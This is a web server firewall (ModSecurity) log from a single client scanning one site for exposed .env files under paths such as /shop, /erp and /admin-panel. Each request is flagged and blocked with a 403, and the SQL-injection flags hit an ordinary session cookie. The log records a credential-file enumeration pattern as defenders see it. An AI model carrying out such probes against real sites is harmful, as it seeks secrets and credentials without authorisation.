[Mon May 11 16:33:41.063416 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXrwAAAM0"]
[Mon May 11 16:33:41.063647 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXrwAAAM0"]
[Mon May 11 16:33:41.244690 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsQAAAM0"]
[Mon May 11 16:33:41.245057 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsQAAAM0"]
[Mon May 11 16:33:41.245253 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsQAAAM0"]
[Mon May 11 16:33:41.245486 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/shop/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsQAAAM0"]
[Mon May 11 16:33:41.410148 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsgAAAM0"]
[Mon May 11 16:33:41.410552 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsgAAAM0"]
[Mon May 11 16:33:41.410735 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsgAAAM0"]
[Mon May 11 16:33:41.410972 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/store/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXsgAAAM0"]
[Mon May 11 16:33:41.574652 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXswAAAM0"]
[Mon May 11 16:33:41.575101 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXswAAAM0"]
[Mon May 11 16:33:41.575317 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXswAAAM0"]
[Mon May 11 16:33:41.575558 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/saas/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXswAAAM0"]
[Mon May 11 16:33:41.739013 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtAAAAM0"]
[Mon May 11 16:33:41.739398 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtAAAAM0"]
[Mon May 11 16:33:41.739586 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtAAAAM0"]
[Mon May 11 16:33:41.739816 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/client/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtAAAAM0"]
[Mon May 11 16:33:41.902778 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtQAAAM0"]
[Mon May 11 16:33:41.903169 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtQAAAM0"]
[Mon May 11 16:33:41.903356 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtQAAAM0"]
[Mon May 11 16:33:41.903582 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/project/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXtQAAAM0"]
[Mon May 11 16:33:42.069182 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXtwAAAM0"]
[Mon May 11 16:33:42.069548 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXtwAAAM0"]
[Mon May 11 16:33:42.069720 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXtwAAAM0"]
[Mon May 11 16:33:42.069986 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/admin-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXtwAAAM0"]
[Mon May 11 16:33:42.234217 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuAAAAM0"]
[Mon May 11 16:33:42.234563 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuAAAAM0"]
[Mon May 11 16:33:42.234737 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuAAAAM0"]
[Mon May 11 16:33:42.234987 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/control-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuAAAAM0"]
[Mon May 11 16:33:42.397979 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXugAAAM0"]
[Mon May 11 16:33:42.398370 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXugAAAM0"]
[Mon May 11 16:33:42.398556 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXugAAAM0"]
[Mon May 11 16:33:42.398809 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXugAAAM0"]
[Mon May 11 16:33:42.563525 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuwAAAM0"]
[Mon May 11 16:33:42.563893 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuwAAAM0"]
